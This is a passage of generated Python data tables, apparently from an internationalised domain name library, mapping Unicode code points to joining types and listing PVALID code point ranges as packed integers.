0x1862: 68,
0x1863: 68,
0x1864: 68,
0x1865: 68,
0x1866: 68,
0x1867: 68,
0x1868: 68,
0x1869: 68,
0x186a: 68,
0x186b: 68,
0x186c: 68,
0x186d: 68,
0x186e: 68,
0x186f: 68,
0x1870: 68,
0x1871: 68,
0x1872: 68,
0x1873: 68,
0x1874: 68,
0x1875: 68,
0x1876: 68,
0x1877: 68,
0x1878: 68,
0x1880: 85,
0x1881: 85,
0x1882: 85,
0x1883: 85,
0x1884: 85,
0x1885: 84,
0x1886: 84,
0x1887: 68,
0x1888: 68,
0x1889: 68,
0x188a: 68,
0x188b: 68,
0x188c: 68,
0x188d: 68,
0x188e: 68,
0x188f: 68,
0x1890: 68,
0x1891: 68,
0x1892: 68,
0x1893: 68,
0x1894: 68,
0x1895: 68,
0x1896: 68,
0x1897: 68,
0x1898: 68,
0x1899: 68,
0x189a: 68,
0x189b: 68,
0x189c: 68,
0x189d: 68,
0x189e: 68,
0x189f: 68,
0x18a0: 68,
0x18a1: 68,
0x18a2: 68,
0x18a3: 68,
0x18a4: 68,
0x18a5: 68,
0x18a6: 68,
0x18a7: 68,
0x18a8: 68,
0x18aa: 68,
0x200c: 85,
0x200d: 67,
0x202f: 85,
0x2066: 85,
0x2067: 85,
0x2068: 85,
0x2069: 85,
0xa840: 68,
0xa841: 68,
0xa842: 68,
0xa843: 68,
0xa844: 68,
0xa845: 68,
0xa846: 68,
0xa847: 68,
0xa848: 68,
0xa849: 68,
0xa84a: 68,
0xa84b: 68,
0xa84c: 68,
0xa84d: 68,
0xa84e: 68,
0xa84f: 68,
0xa850: 68,
0xa851: 68,
0xa852: 68,
0xa853: 68,
0xa854: 68,
0xa855: 68,
0xa856: 68,
0xa857: 68,
0xa858: 68,
0xa859: 68,
0xa85a: 68,
0xa85b: 68,
0xa85c: 68,
0xa85d: 68,
0xa85e: 68,
0xa85f: 68,
0xa860: 68,
0xa861: 68,
0xa862: 68,
0xa863: 68,
0xa864: 68,
0xa865: 68,
0xa866: 68,
0xa867: 68,
0xa868: 68,
0xa869: 68,
0xa86a: 68,
0xa86b: 68,
0xa86c: 68,
0xa86d: 68,
0xa86e: 68,
0xa86f: 68,
0xa870: 68,
0xa871: 68,
0xa872: 76,
0xa873: 85,
0x10ac0: 68,
0x10ac1: 68,
0x10ac2: 68,
0x10ac3: 68,
0x10ac4: 68,
0x10ac5: 82,
0x10ac6: 85,
0x10ac7: 82,
0x10ac8: 85,
0x10ac9: 82,
0x10aca: 82,
0x10acb: 85,
0x10acc: 85,
0x10acd: 76,
0x10ace: 82,
0x10acf: 82,
0x10ad0: 82,
0x10ad1: 82,
0x10ad2: 82,
0x10ad3: 68,
0x10ad4: 68,
0x10ad5: 68,
0x10ad6: 68,
0x10ad7: 76,
0x10ad8: 68,
0x10ad9: 68,
0x10ada: 68,
0x10adb: 68,
0x10adc: 68,
0x10add: 82,
0x10ade: 68,
0x10adf: 68,
0x10ae0: 68,
0x10ae1: 82,
0x10ae2: 85,
0x10ae3: 85,
0x10ae4: 82,
0x10aeb: 68,
0x10aec: 68,
0x10aed: 68,
0x10aee: 68,
0x10aef: 82,
0x10b80: 68,
0x10b81: 82,
0x10b82: 68,
0x10b83: 82,
0x10b84: 82,
0x10b85: 82,
0x10b86: 68,
0x10b87: 68,
0x10b88: 68,
0x10b89: 82,
0x10b8a: 68,
0x10b8b: 68,
0x10b8c: 82,
0x10b8d: 68,
0x10b8e: 82,
0x10b8f: 82,
0x10b90: 68,
0x10b91: 82,
0x10ba9: 82,
0x10baa: 82,
0x10bab: 82,
0x10bac: 82,
0x10bad: 68,
0x10bae: 68,
0x10baf: 85,
0x10d00: 76,
0x10d01: 68,
0x10d02: 68,
0x10d03: 68,
0x10d04: 68,
0x10d05: 68,
0x10d06: 68,
0x10d07: 68,
0x10d08: 68,
0x10d09: 68,
0x10d0a: 68,
0x10d0b: 68,
0x10d0c: 68,
0x10d0d: 68,
0x10d0e: 68,
0x10d0f: 68,
0x10d10: 68,
0x10d11: 68,
0x10d12: 68,
0x10d13: 68,
0x10d14: 68,
0x10d15: 68,
0x10d16: 68,
0x10d17: 68,
0x10d18: 68,
0x10d19: 68,
0x10d1a: 68,
0x10d1b: 68,
0x10d1c: 68,
0x10d1d: 68,
0x10d1e: 68,
0x10d1f: 68,
0x10d20: 68,
0x10d21: 68,
0x10d22: 82,
0x10d23: 68,
0x10f30: 68,
0x10f31: 68,
0x10f32: 68,
0x10f33: 82,
0x10f34: 68,
0x10f35: 68,
0x10f36: 68,
0x10f37: 68,
0x10f38: 68,
0x10f39: 68,
0x10f3a: 68,
0x10f3b: 68,
0x10f3c: 68,
0x10f3d: 68,
0x10f3e: 68,
0x10f3f: 68,
0x10f40: 68,
0x10f41: 68,
0x10f42: 68,
0x10f43: 68,
0x10f44: 68,
0x10f45: 85,
0x10f51: 68,
0x10f52: 68,
0x10f53: 68,
0x10f54: 82,
0x110bd: 85,
0x110cd: 85,
0x1e900: 68,
0x1e901: 68,
0x1e902: 68,
0x1e903: 68,
0x1e904: 68,
0x1e905: 68,
0x1e906: 68,
0x1e907: 68,
0x1e908: 68,
0x1e909: 68,
0x1e90a: 68,
0x1e90b: 68,
0x1e90c: 68,
0x1e90d: 68,
0x1e90e: 68,
0x1e90f: 68,
0x1e910: 68,
0x1e911: 68,
0x1e912: 68,
0x1e913: 68,
0x1e914: 68,
0x1e915: 68,
0x1e916: 68,
0x1e917: 68,
0x1e918: 68,
0x1e919: 68,
0x1e91a: 68,
0x1e91b: 68,
0x1e91c: 68,
0x1e91d: 68,
0x1e91e: 68,
0x1e91f: 68,
0x1e920: 68,
0x1e921: 68,
0x1e922: 68,
0x1e923: 68,
0x1e924: 68,
0x1e925: 68,
0x1e926: 68,
0x1e927: 68,
0x1e928: 68,
0x1e929: 68,
0x1e92a: 68,
0x1e92b: 68,
0x1e92c: 68,
0x1e92d: 68,
0x1e92e: 68,
0x1e92f: 68,
0x1e930: 68,
0x1e931: 68,
0x1e932: 68,
0x1e933: 68,
0x1e934: 68,
0x1e935: 68,
0x1e936: 68,
0x1e937: 68,
0x1e938: 68,
0x1e939: 68,
0x1e93a: 68,
0x1e93b: 68,
0x1e93c: 68,
0x1e93d: 68,
0x1e93e: 68,
0x1e93f: 68,
0x1e940: 68,
0x1e941: 68,
0x1e942: 68,
0x1e943: 68,
}
codepoint_classes = {
'PVALID': (
0x2d0000002e,
0x300000003a,
0x610000007b,
0xdf000000f7,
0xf800000100,
0x10100000102,
0x10300000104,
0x10500000106,
0x10700000108,
0x1090000010a,
0x10b0000010c,
0x10d0000010e,
0x10f00000110,
0x11100000112,
0x11300000114,
0x11500000116,
0x11700000118,
0x1190000011a,
0x11b0000011c,
0x11d0000011e,
0x11f00000120,
0x12100000122,
0x12300000124,
0x12500000126,
0x12700000128,
0x1290000012a,
0x12b0000012c,
0x12d0000012e,
0x12f00000130,
0x13100000132,
0x13500000136,
0x13700000139,
0x13a0000013b,
0x13c0000013d,
0x13e0000013f,
0x14200000143,
0x14400000145,
0x14600000147,
0x14800000149,
0x14b0000014c,
0x14d0000014e,
0x14f00000150,
0x15100000152,
0x15300000154,
0x15500000156,
0x15700000158,
0x1590000015a,
0x15b0000015c,
0x15d0000015e,
0x15f00000160,
0x16100000162,
0x16300000164,
0x16500000166,
0x16700000168,
0x1690000016a,
0x16b0000016c,
0x16d0000016e,
0x16f00000170,
0x17100000172,
0x17300000174,
0x17500000176,
0x17700000178,
0x17a0000017b,
0x17c0000017d,
0x17e0000017f,
0x18000000181,
0x18300000184,
0x18500000186,
0x18800000189,
0x18c0000018e,
0x19200000193,
0x19500000196,
0x1990000019c,
0x19e0000019f,
0x1a1000001a2,
0x1a3000001a4,
0x1a5000001a6,
0x1a8000001a9,
0x1aa000001ac,
0x1ad000001ae,
0x1b0000001b1,
0x1b4000001b5,
0x1b6000001b7,
0x1b9000001bc,
0x1bd000001c4,
0x1ce000001cf,
0x1d0000001d1,
0x1d2000001d3,
0x1d4000001d5,
0x1d6000001d7,
0x1d8000001d9,
0x1da000001db,
0x1dc000001de,
0x1df000001e0,
0x1e1000001e2,
0x1e3000001e4,
0x1e5000001e6,
0x1e7000001e8,
0x1e9000001ea,
0x1eb000001ec,
0x1ed000001ee,
0x1ef000001f1,
0x1f5000001f6,
0x1f9000001fa,
0x1fb000001fc,
0x1fd000001fe,
0x1ff00000200,
0x20100000202,
0x20300000204,
0x20500000206,
0x20700000208,
0x2090000020a,
0x20b0000020c,
0x20d0000020e,
0x20f00000210,
0x21100000212,
0x21300000214,
0x21500000216,
0x21700000218,
0x2190000021a,
0x21b0000021c,
0x21d0000021e,
0x21f00000220,
0x22100000222,
0x22300000224,
0x22500000226,
0x22700000228,
0x2290000022a,
0x22b0000022c,
0x22d0000022e,
0x22f00000230,
0x23100000232,
0x2330000023a,
0x23c0000023d,
0x23f00000241,
0x24200000243,
0x24700000248,
0x2490000024a,
0x24b0000024c,
0x24d0000024e,
0x24f000002b0,
0x2b9000002c2,
0x2c6000002d2,
0x2ec000002ed,
0x2ee000002ef,
0x30000000340,
0x34200000343,
0x3460000034f,
0x35000000370,
0x37100000372,
0x37300000374,
0x37700000378,
0x37b0000037e,
0x39000000391,
0x3ac000003cf,
0x3d7000003d8,
0x3d9000003da,
0x3db000003dc,
0x3dd000003de,
0x3df000003e0,
0x3e1000003e2,
0x3e3000003e4,
0x3e5000003e6,
0x3e7000003e8,
0x3e9000003ea,
0x3eb000003ec,
0x3ed000003ee,
0x3ef000003f0,
0x3f3000003f4,
0x3f8000003f9,
0x3fb000003fd,
0x43000000460,
0x46100000462,
0x46300000464,
0x46500000466,
0x46700000468,
0x4690000046a,
0x46b0000046c,
0x46d0000046e,
0x46f00000470,
0x47100000472,
0x47300000474,
0x47500000476,
0x47700000478,
0x4790000047a,
0x47b0000047c,
0x47d0000047e,
0x47f00000480,
0x48100000482,
0x48300000488,
0x48b0000048c,
0x48d0000048e,
0x48f00000490,
0x49100000492,
0x49300000494,
0x49500000496,
0x49700000498,
0x4990000049a,
0x49b0000049c,
0x49d0000049e,
0x49f000004a0,
0x4a1000004a2,
0x4a3000004a4,
0x4a5000004a6,
0x4a7000004a8,
0x4a9000004aa,
0x4ab000004ac,
0x4ad000004ae,
0x4af000004b0,
0x4b1000004b2,
0x4b3000004b4,
0x4b5000004b6,
0x4b7000004b8,
0x4b9000004ba,
0x4bb000004bc,
0x4bd000004be,
0x4bf000004c0,
0x4c2000004c3,
0x4c4000004c5,
0x4c6000004c7,
0x4c8000004c9,
0x4ca000004cb,
0x4cc000004cd,
0x4ce000004d0,
0x4d1000004d2,
0x4d3000004d4,
0x4d5000004d6,
0x4d7000004d8,
0x4d9000004da,
0x4db000004dc,
0x4dd000004de,
0x4df000004e0,
0x4e1000004e2,
0x4e3000004e4,
0x4e5000004e6,
0x4e7000004e8,
0x4e9000004ea,
0x4eb000004ec,
0x4ed000004ee,
0x4ef000004f0,
0x4f1000004f2,
0x4f3000004f4,
0x4f5000004f6,
0x4f7000004f8,
0x4f9000004fa,
0x4fb000004fc,
0x4fd000004fe,
0x4ff00000500,
0x50100000502,
0x50300000504,
0x50500000506,
0x50700000508,
0x5090000050a,
0x50b0000050c,
0x50d0000050e,
0x50f00000510,
0x51100000512,
0x51300000514,
0x51500000516,
0x51700000518,
0x5190000051a,
0x51b0000051c,
0x51d0000051e,
0x51f00000520,
0x52100000522,
0x52300000524,
0x52500000526,
0x52700000528,
0x5290000052a,
0x52b0000052c,
0x52d0000052e,
0x52f00000530,
0x5590000055a,
0x56000000587,
0x58800000589,
0x591000005be,
0x5bf000005c0,
0x5c1000005c3,
0x5c4000005c6,
0x5c7000005c8,
0x5d0000005eb,
0x5ef000005f3,
0x6100000061b,
0x62000000640,
0x64100000660,
0x66e00000675,
0x679000006d4,
0x6d5000006dd,
0x6df000006e9,
0x6ea000006f0,
0x6fa00000700,
0x7100000074b,
0x74d000007b2,
0x7c0000007f6,
0x7fd000007fe,
0x8000000082e,
0x8400000085c,
0x8600000086b,
0x8a0000008b5,
0x8b6000008be,
0x8d3000008e2,
0x8e300000958,
0x96000000964,
0x96600000970,
0x97100000984,
0x9850000098d,
0x98f00000991,
0x993000009a9,
0x9aa000009b1,
0x9b2000009b3,
0x9b6000009ba,
0x9bc000009c5,
0x9c7000009c9,
0x9cb000009cf,
0x9d7000009d8,
0x9e0000009e4,
0x9e6000009f2,
0x9fc000009fd,
0x9fe000009ff,
0xa0100000a04,
0xa0500000a0b,
0xa0f00000a11,
0xa1300000a29,
0xa2a00000a31,
0xa3200000a33,
0xa3500000a36,
0xa3800000a3a,
0xa3c00000a3d,
0xa3e00000a43,
0xa4700000a49,
0xa4b00000a4e,
0xa5100000a52,
0xa5c00000a5d,
0xa6600000a76,
0xa8100000a84,
0xa8500000a8e,
0xa8f00000a92,
0xa9300000aa9,
0xaaa00000ab1,
0xab200000ab4,
0xab500000aba,
0xabc00000ac6,
0xac700000aca,
0xacb00000ace,
0xad000000ad1,
0xae000000ae4,
0xae600000af0,
0xaf900000b00,
0xb0100000b04,
0xb0500000b0d,
0xb0f00000b11,
0xb1300000b29,
0xb2a00000b31,
0xb3200000b34,
0xb3500000b3a,
0xb3c00000b45,
0xb4700000b49,
0xb4b00000b4e,
0xb5600000b58,
0xb5f00000b64,
0xb6600000b70,
0xb7100000b72,
0xb8200000b84,
0xb8500000b8b,
0xb8e00000b91,
0xb9200000b96,
0xb9900000b9b,
0xb9c00000b9d,
0xb9e00000ba0,
0xba300000ba5,
0xba800000bab,
0xbae00000bba,
0xbbe00000bc3,
0xbc600000bc9,
0xbca00000bce,
0xbd000000bd1,
0xbd700000bd8,
0xbe600000bf0,
0xc0000000c0d,
0xc0e00000c11,
0xc1200000c29,
0xc2a00000c3a,
0xc3d00000c45,
0xc4600000c49,
0xc4a00000c4e,
0xc5500000c57,
0xc5800000c5b,
0xc6000000c64,
0xc6600000c70,
0xc8000000c84,
0xc8500000c8d,
0xc8e00000c91,
0xc9200000ca9,
0xcaa00000cb4,
0xcb500000cba,
0xcbc00000cc5,
0xcc600000cc9,
0xcca00000cce,
0xcd500000cd7,
0xcde00000cdf,
0xce000000ce4,
0xce600000cf0,
0xcf100000cf3,
0xd0000000d04,
0xd0500000d0d,
0xd0e00000d11,
0xd1200000d45,
0xd4600000d49,
0xd4a00000d4f,
0xd5400000d58,
0xd5f00000d64,
0xd6600000d70,
0xd7a00000d80,
0xd8200000d84,
0xd8500000d97,
0xd9a00000db2,
0xdb300000dbc,
0xdbd00000dbe,
0xdc000000dc7,
0xdca00000dcb,
0xdcf00000dd5,
0xdd600000dd7,
0xdd800000de0,
0xde600000df0,
0xdf200000df4,
0xe0100000e33,
0xe3400000e3b,
0xe4000000e4f,
0xe5000000e5a,
0xe8100000e83,
0xe8400000e85,
0xe8700000e89,
0xe8a00000e8b,
0xe8d00000e8e,
0xe9400000e98,
0xe9900000ea0,
0xea100000ea4,
0xea500000ea6,
0xea700000ea8,
0xeaa00000eac,
0xead00000eb3,
0xeb400000eba,
0xebb00000ebe,
0xec000000ec5,
0xec600000ec7,
0xec800000ece,
0xed000000eda,
0xede00000ee0,
0xf0000000f01,
0xf0b00000f0c,
0xf1800000f1a,
0xf2000000f2a,
0xf3500000f36,
0xf3700000f38,
0xf3900000f3a,
0xf3e00000f43,
0xf4400000f48,
0xf4900000f4d,
0xf4e00000f52,
0xf5300000f57,
0xf5800000f5c,
0xf5d00000f69,
0xf6a00000f6d,
0xf7100000f73,
0xf7400000f75,
0xf7a00000f81,
0xf8200000f85,
0xf8600000f93,
0xf9400000f98,
0xf9900000f9d,
0xf9e00000fa2,
0xfa300000fa7,
0xfa800000fac,
0xfad00000fb9,
0xfba00000fbd,
0xfc600000fc7,
0x10000000104a,
0x10500000109e,
0x10d0000010fb,
0x10fd00001100,
0x120000001249,
0x124a0000124e,
0x125000001257,
0x125800001259,
0x125a0000125e,
0x126000001289,
0x128a0000128e,
0x1290000012b1,
0x12b2000012b6,
0x12b8000012bf,
0x12c0000012c1,
0x12c2000012c6,
0x12c8000012d7,
0x12d800001311,
0x131200001316,
0x13180000135b,
0x135d00001360,
0x138000001390,
0x13a0000013f6,
0x14010000166d,
0x166f00001680,
0x16810000169b,
0x16a0000016eb,
0x16f1000016f9,
0x17000000170d,
0x170e00001715,
0x172000001735,
0x174000001754,
0x17600000176d,
0x176e00001771,
0x177200001774,
0x1780000017b4,
0x17b6000017d4,
0x17d7000017d8,
0x17dc000017de,
0x17e0000017ea,
0x18100000181a,
0x182000001879,
0x1880000018ab,
0x18b0000018f6,
0x19000000191f,
0x19200000192c,
0x19300000193c,
0x19460000196e,
0x197000001975,
0x1980000019ac,
0x19b0000019ca,
0x19d0000019da,
0x1a0000001a1c,
0x1a2000001a5f,
0x1a6000001a7d,
0x1a7f00001a8a,
0x1a9000001a9a,
0x1aa700001aa8,
0x1ab000001abe,
0x1b0000001b4c,
0x1b5000001b5a,
0x1b6b00001b74,
0x1b8000001bf4,
0x1c0000001c38,
0x1c4000001c4a,
0x1c4d00001c7e,
0x1cd000001cd3,
0x1cd400001cfa,
0x1d0000001d2c,
0x1d2f00001d30,
0x1d3b00001d3c,
0x1d4e00001d4f,
0x1d6b00001d78,
0x1d7900001d9b,
0x1dc000001dfa,
0x1dfb00001e00,
0x1e0100001e02,
0x1e0300001e04,
0x1e0500001e06,
0x1e0700001e08,
0x1e0900001e0a,
0x1e0b00001e0c,
0x1e0d00001e0e,
0x1e0f00001e10,
0x1e1100001e12,
0x1e1300001e14,
0x1e1500001e16,
0x1e1700001e18,
0x1e1900001e1a,
0x1e1b00001e1c,
0x1e1d00001e1e,
0x1e1f00001e20,
0x1e2100001e22,
0x1e2300001e24,
0x1e2500001e26,
0x1e2700001e28,
0x1e2900001e2a,
0x1e2b00001e2c,
0x1e2d00001e2e,
0x1e2f00001e30,
0x1e3100001e32,
0x1e3300001e34,
0x1e3500001e36,
0x1e3700001e38,
0x1e3900001e3a,
0x1e3b00001e3c,
0x1e3d00001e3e,
0x1e3f00001e40,
0x1e4100001e42,
0x1e4300001e44,
0x1e4500001e46,
0x1e4700001e48,
0x1e4900001e4a,
0x1e4b00001e4c,
0x1e4d00001e4e,
0x1e4f00001e50,
0x1e5100001e52,
0x1e5300001e54,
0x1e5500001e56,
0x1e5700001e58,
0x1e5900001e5a,
0x1e5b00001e5c,
0x1e5d00001e5e,
0x1e5f00001e60,
0x1e6100001e62,
0x1e6300001e64,
0x1e6500001e66,
0x1e6700001e68,
0x1e6900001e6a,
0x1e6b00001e6c,
0x1e6d00001e6e,
0x1e6f00001e70,
0x1e7100001e72,
0x1e7300001e74,
0x1e7500001e76,
0x1e7700001e78,
0x1e7900001e7a,
0x1e7b00001e7c,
0x1e7d00001e7e,
0x1e7f00001e80,
0x1e8100001e82,
0x1e8300001e84,
0x1e8500001e86,
0x1e8700001e88,
0x1e8900001e8a,
0x1e8b00001e8c,
0x1e8d00001e8e,
0x1e8f00001e90,
0x1e9100001e92,
0x1e9300001e94,
0x1e9500001e9a,
0x1e9c00001e9e,
0x1e9f00001ea0,
0x1ea100001ea2,
0x1ea300001ea4,
0x1ea500001ea6,
0x1ea700001ea8,
0x1ea900001eaa,
0x1eab00001eac,
0x1ead00001eae,
0x1eaf00001eb0,
0x1eb100001eb2,
0x1eb300001eb4,
0x1eb500001eb6,
0x1eb700001eb8,
0x1eb900001eba,
0x1ebb00001ebc,
0x1ebd00001ebe,
0x1ebf00001ec0,
0x1ec100001ec2,
0x1ec300001ec4,
0x1ec500001ec6,
0x1ec700001ec8,
0x1ec900001eca,
0x1ecb00001ecc,
0x1ecd00001ece,
0x1ecf00001ed0,
0x1ed100001ed2,
0x1ed300001ed4,
0x1ed500001ed6,
0x1ed700001ed8,
0x1ed900001eda,
0x1edb00001edc,
0x1edd00001ede,
0x1edf00001ee0,
0x1ee100001ee2,
0x1ee300001ee4,
0x1ee500001ee6,
0x1ee700001ee8,
0x1ee900001eea,
0x1eeb00001eec,
0x1eed00001eee,
0x1eef00001ef0,
0x1ef100001ef2,
0x1ef300001ef4,
0x1ef500001ef6,
0x1ef700001ef8,
0x1ef900001efa,
0x1efb00001efc,
0x1efd00001efe,
0x1eff00001f08,
0x1f1000001f16,
0x1f2000001f28,
0x1f3000001f38,
0x1f4000001f46,
0x1f5000001f58,
0x1f6000001f68,
0x1f7000001f71,
0x1f7200001f73,
0x1f7400001f75,
0x1f7600001f77,
0x1f7800001f79,
0x1f7a00001f7b,
0x1f7c00001f7d,
0x1fb000001fb2,
0x1fb600001fb7,
0x1fc600001fc7,
0x1fd000001fd3,
0x1fd600001fd8,
0x1fe000001fe3,
0x1fe400001fe8,
0x1ff600001ff7,
0x214e0000214f,
0x218400002185,
0x2c3000002c5f,
0x2c6100002c62,
0x2c6500002c67,
0x2c6800002c69,
0x2c6a00002c6b,
0x2c6c00002c6d,
0x2c7100002c72,
0x2c7300002c75,
0x2c7600002c7c,
0x2c8100002c82,
0x2c8300002c84,
0x2c8500002c86,
0x2c8700002c88,
0x2c8900002c8a,
0x2c8b00002c8c,
0x2c8d00002c8e,
0x2c8f00002c90,
0x2c9100002c92,
0x2c9300002c94,
0x2c9500002c96,
0x2c9700002c98,
0x2c9900002c9a,
0x2c9b00002c9c,
0x2c9d00002c9e,
0x2c9f00002ca0,
0x2ca100002ca2,
0x2ca300002ca4,
0x2ca500002ca6,
0x2ca700002ca8,
0x2ca900002caa,
0x2cab00002cac,
0x2cad00002cae,
0x2caf00002cb0,
0x2cb100002cb2,
0x2cb300002cb4,
0x2cb500002cb6,
0x2cb700002cb8,
0x2cb900002cba,
0x2cbb00002cbc,
0x2cbd00002cbe,
0x2cbf00002cc0,
0x2cc100002cc2,
0x2cc300002cc4,
0x2cc500002cc6,
0x2cc700002cc8,
0x2cc900002cca,
0x2ccb00002ccc,
0x2ccd00002cce,
0x2ccf00002cd0,
0x2cd100002cd2,
0x2cd300002cd4,
0x2cd500002cd6,
0x2cd700002cd8,
0x2cd900002cda,
0x2cdb00002cdc,
0x2cdd00002cde,
0x2cdf00002ce0,
0x2ce100002ce2,
0x2ce300002ce5,
0x2cec00002ced,
0x2cee00002cf2,
0x2cf300002cf4,
0x2d0000002d26,
0x2d2700002d28,
0x2d2d00002d2e,
0x2d3000002d68,
0x2d7f00002d97,
0x2da000002da7,
0x2da800002daf,
0x2db000002db7,
0x2db800002dbf,
0x2dc000002dc7,
0x2dc800002dcf,
0x2dd000002dd7,
0x2dd800002ddf,
0x2de000002e00,
0x2e2f00002e30,
0x300500003008,
0x302a0000302e,
0x303c0000303d,
0x304100003097,
0x30990000309b,
0x309d0000309f,
0x30a1000030fb,
0x30fc000030ff,
0x310500003130,
0x31a0000031bb,
0x31f000003200,
0x340000004db6,
0x4e0000009ff0,
0xa0000000a48d,
0xa4d00000a4fe,
0xa5000000a60d,
0xa6100000a62c,
0xa6410000a642,
0xa6430000a644,
0xa6450000a646,
0xa6470000a648,
0xa6490000a64a,
0xa64b0000a64c,
0xa64d0000a64e,
0xa64f0000a650,
0xa6510000a652,
0xa6530000a654,
0xa6550000a656,
0xa6570000a658,
0xa6590000a65a,
0xa65b0000a65c,
0xa65d0000a65e,
0xa65f0000a660,
0xa6610000a662,
0xa6630000a664,
0xa6650000a666,
0xa6670000a668,
0xa6690000a66a,
0xa66b0000a66c,
0xa66d0000a670,
0xa6740000a67e,
0xa67f0000a680,
0xa6810000a682,
0xa6830000a684,
0xa6850000a686,
0xa6870000a688,
0xa6890000a68a,
0xa68b0000a68c,
0xa68d0000a68e,
0xa68f0000a690,
0xa6910000a692,
0xa6930000a694,
0xa6950000a696,
0xa6970000a698,
0xa6990000a69a,
0xa69b0000a69c,
0xa69e0000a6e6,
0xa6f00000a6f2,
0xa7170000a720,
0xa7230000a724,
0xa7250000a726,
0xa7270000a728,
0xa7290000a72a,
0xa72b0000a72c,
0xa72d0000a72e,
0xa72f0000a732,
0xa7330000a734,
0xa7350000a736,
0xa7370000a738,
0xa7390000a73a,
0xa73b0000a73c,
0xa73d0000a73e,
0xa73f0000a740,
0xa7410000a742,
0xa7430000a744,
0xa7450000a746,
0xa7470000a748,
0xa7490000a74a,
0xa74b0000a74c,
0xa74d0000a74e,
0xa74f0000a750,
0xa7510000a752,
0xa7530000a754,
0xa7550000a756,
0xa7570000a758,
0xa7590000a75a,
0xa75b0000a75c,
0xa75d0000a75e,
0xa75f0000a760,
0xa7610000a762,
0xa7630000a764,
0xa7650000a766,
0xa7670000a768,
0xa7690000a76a,
0xa76b0000a76c,
0xa76d0000a76e,
0xa76f0000a770,
0xa7710000a779,
0xa77a0000a77b,
0xa77c0000a77d,
0xa77f0000a780,
0xa7810000a782,
0xa7830000a784,
0xa7850000a786,
0xa7870000a789,
0xa78c0000a78d,
0xa78e0000a790,
0xa7910000a792,
0xa7930000a796,
0xa7970000a798,
0xa7990000a79a,
0xa79b0000a79c,
0xa79d0000a79e,
0xa79f0000a7a0,
0xa7a10000a7a2,
0xa7a30000a7a4,
0xa7a50000a7a6,
0xa7a70000a7a8,
0xa7a90000a7aa,
0xa7af0000a7b0,
0xa7b50000a7b6,
0xa7b70000a7b8,
0xa7b90000a7ba,
0xa7f70000a7f8,
0xa7fa0000a828,
0xa8400000a874,
0xa8800000a8c6,
0xa8d00000a8da,
0xa8e00000a8f8,
0xa8fb0000a8fc,
0xa8fd0000a92e,
0xa9300000a954,
0xa9800000a9c1,
0xa9cf0000a9da,
0xa9e00000a9ff,
0xaa000000aa37,
0xaa400000aa4e,
0xaa500000aa5a,
0xaa600000aa77,
0xaa7a0000aac3,
0xaadb0000aade,
0xaae00000aaf0,
0xaaf20000aaf7,
0xab010000ab07,
0xab090000ab0f,
0xab110000ab17,
0xab200000ab27,
0xab280000ab2f,
0xab300000ab5b,
0xab600000ab66,
0xabc00000abeb,
0xabec0000abee,
0xabf00000abfa,
0xac000000d7a4,
0xfa0e0000fa10,
0xfa110000fa12,
0xfa130000fa15,
0xfa1f0000fa20,
0xfa210000fa22,
0xfa230000fa25,
0xfa270000fa2a,
0xfb1e0000fb1f,
0xfe200000fe30,
0xfe730000fe74,
0x100000001000c,
0x1000d00010027,
0x100280001003b,
0x1003c0001003e,
0x1003f0001004e,
0x100500001005e,
0x10080000100fb,
0x101fd000101fe,
0x102800001029d,
0x102a0000102d1,
0x102e0000102e1,
0x1030000010320,
0x1032d00010341,
0x103420001034a,
0x103500001037b,
0x103800001039e,
0x103a0000103c4,
0x103c8000103d0,
0x104280001049e,
0x104a0000104aa,
0x104d8000104fc,
0x1050000010528,
0x1053000010564,
0x1060000010737,
0x1074000010756,
0x1076000010768,
0x1080000010806,
0x1080800010809,
0x1080a00010836,
0x1083700010839,
0x1083c0001083d,
0x1083f00010856,
0x1086000010877,
0x108800001089f,
0x108e0000108f3,
0x108f4000108f6,
0x1090000010916,
0x109200001093a,
0x10980000109b8,
0x109be000109c0,
0x10a0000010a04,
0x10a0500010a07,
0x10a0c00010a14,
0x10a1500010a18,
0x10a1900010a36,
0x10a3800010a3b,
0x10a3f00010a40,
0x10a6000010a7d,
0x10a8000010a9d,
0x10ac000010ac8,
0x10ac900010ae7,
0x10b0000010b36,
0x10b4000010b56,
0x10b6000010b73,
0x10b8000010b92,
0x10c0000010c49,
0x10cc000010cf3,
0x10d0000010d28,
0x10d3000010d3a,
0x10f0000010f1d,
0x10f2700010f28,
0x10f3000010f51,
0x1100000011047,
0x1106600011070,
0x1107f000110bb,
0x110d0000110e9,
0x110f0000110fa,
0x1110000011135,
0x1113600011140,
0x1114400011147,
0x1115000011174,
0x1117600011177,
0x11180000111c5,
0x111c9000111cd,
0x111d0000111db,
0x111dc000111dd,
0x1120000011212,
0x1121300011238,
0x1123e0001123f,
0x1128000011287,
0x1128800011289,
0x1128a0001128e,
0x1128f0001129e,
0x1129f000112a9,
0x112b0000112eb,
0x112f0000112fa,
0x1130000011304,
0x113050001130d,
0x1130f00011311,
0x1131300011329,
0x1132a00011331,
0x1133200011334,
0x113350001133a,
0x1133b00011345,
0x1134700011349,
0x1134b0001134e,
0x1135000011351,
0x1135700011358,
0x1135d00011364,
0x113660001136d,
0x1137000011375,
0x114000001144b,
0x114500001145a,
0x1145e0001145f,
0x11480000114c6,
0x114c7000114c8,
0x114d0000114da,
0x11580000115b6,
0x115b8000115c1,
0x115d8000115de,
0x1160000011641,
0x1164400011645,
0x116500001165a,
0x11680000116b8,
0x116c0000116ca,
0x117000001171b,
0x1171d0001172c,
0x117300001173a,
0x118000001183b,
0x118c0000118ea,
0x118ff00011900,
0x11a0000011a3f,
0x11a4700011a48,
0x11a5000011a84,
0x11a8600011a9a,
0x11a9d00011a9e,
0x11ac000011af9,
0x11c0000011c09,
0x11c0a00011c37,
0x11c3800011c41,
0x11c5000011c5a,
0x11c7200011c90,
0x11c9200011ca8,
0x11ca900011cb7,
0x11d0000011d07,
0x11d0800011d0a,
0x11d0b00011d37,
0x11d3a00011d3b,
0x11d3c00011d3e,
0x11d3f00011d48,
0x11d5000011d5a,
0x11d6000011d66,
0x11d6700011d69,
0x11d6a00011d8f,
0x11d9000011d92,
0x11d9300011d99,
0x11da000011daa,
0x11ee000011ef7,
0x120000001239a,
0x1248000012544,
0x130000001342f,
0x1440000014647,
0x1680000016a39,
0x16a4000016a5f,
0x16a6000016a6a,
0x16ad000016aee,
0x16af000016af5,
0x16b0000016b37,
0x16b4000016b44,
0x16b5000016b5a,
0x16b6300016b78,
0x16b7d00016b90,
0x16e6000016e80,
0x16f0000016f45,
0x16f5000016f7f,
0x16f8f00016fa0,
0x16fe000016fe2,
0x17000000187f2,
0x1880000018af3,
0x1b0000001b11f,
0x1b1700001b2fc,
0x1bc000001bc6b,
